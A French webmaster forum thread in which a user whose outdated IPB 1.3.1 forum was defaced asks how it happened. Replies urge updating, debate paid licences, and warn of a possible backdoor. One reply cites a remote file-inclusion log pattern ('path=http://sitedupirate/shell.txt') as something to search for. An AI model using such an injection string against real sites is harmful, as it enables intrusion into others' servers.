Un ricain m'a gentilment hacké mon forum IPB : comment ?

WRInaute discret
salut a tous

Voila je possede un forum IPB, et en m'y connectant, je vois quoi ?

il a était tournée off-line avec un message :

"hello
heey geriyyyy whats going on?
hacked by gok-ay"

heureusement, il a touché a rien d'autre, j'ai pu me conencté en admin et passer le forum sur on dans l'admin

je lui ai laisser un message amicale dans cette section admin, au cas ou il repasserais et aurais envie de me refaire le coup, car je sais pas comment il a fait, et il aurais pu TOUS supprimer si il l'aurais voulu

c un forum IPB v1.3.1 Final © 2003

ca m'inquiete, qui connais la faille ?

merci beaucoup
 
WRInaute accro
Tu es au courant que IPB est en version 2.* ?
La version 1.3 n'est plus maintenue, et des failles découvertes depuis la sortie de la version 2 il y a plus de deux ans, il doit y en avoir pas mal ...

Donc, mets ton forum à jour, en payant une licence pour la version 2.* ou change d'application.
 
WRInaute discret
oué enfin c la derniere version gratuite quoi, un forum c fait pour etre gratuit, le salaire c la satisfaction de sa celebrité, c ça qui me gene

pourtant je pensais que c'était infaillible les pib... par rapport au phpbb
 
WRInaute accro
Ahem ...
On a entendu beaucoup parler de phpBB parce qu'il est la cible favorite des hackers étant le forum gratuit le plus utilisé.
Cela n'empeche pas les autres forums d'avoir également des failles. Toute application en a, c'est inévitable.

Et même si tu a tes opinions concernant la gratuité d'applications, d'autres peuvent en avoir des différentes, dans ce cas la, tu n'utilise pas ces applications.
 
WRInaute accro
Jerome-FR a dit:
oué enfin c la derniere version gratuite quoi, un forum c fait pour etre gratuit, le salaire c la satisfaction de sa celebrité, c ça qui me gene
Ouai, et à la fin du mois ton patron te dit "je suis fier de vous" et donc tu n'iras pas réclamer ta paie :lol: :lol:
 
WRInaute impliqué
Jerome-FR a dit:
oué enfin c la derniere version gratuite quoi, un forum c fait pour etre gratuit, le salaire c la satisfaction de sa celebrité, c ça qui me gene

ouais, effectivement, on peut tout lire et tout entendre sur les forum... mais bon, vaut mieux entendre ça que d'être sourd... :roll:
 
WRInaute discret
Jerome-FR a dit:
heureusement, il a touché a rien d'autre, j'ai pu me conencté en admin et passer le forum sur on dans l'admin

ca m'inquiete, qui connais la faille ?

Touché à rien d'autre ?? rien n'est moins sûr qu'il a pas déposé un script dans ton hébergement qui lui donne accès à ton site, voir à tout le serveur !

Pour la faille consulte tes logs, tu trouveras dans ceux du jour du hacking une ligne bizarre avec ....path=http://sitedupirate/shell.txt par exemple, et là tu verras également le script qui a servi au hacker, et la faille !

Patrick
 
WRInaute passionné
Des failles ? Pleins de failles !
Imagine déjà plus d'une faille trouvé par version, et tu fait le compte !

Avais tu afficher fièrement le numéro de version de ton forum sur le forum ?

Sinon regarde vers punbb il est pas mal et sécurisé ;)
 
Discussions similaires
Haut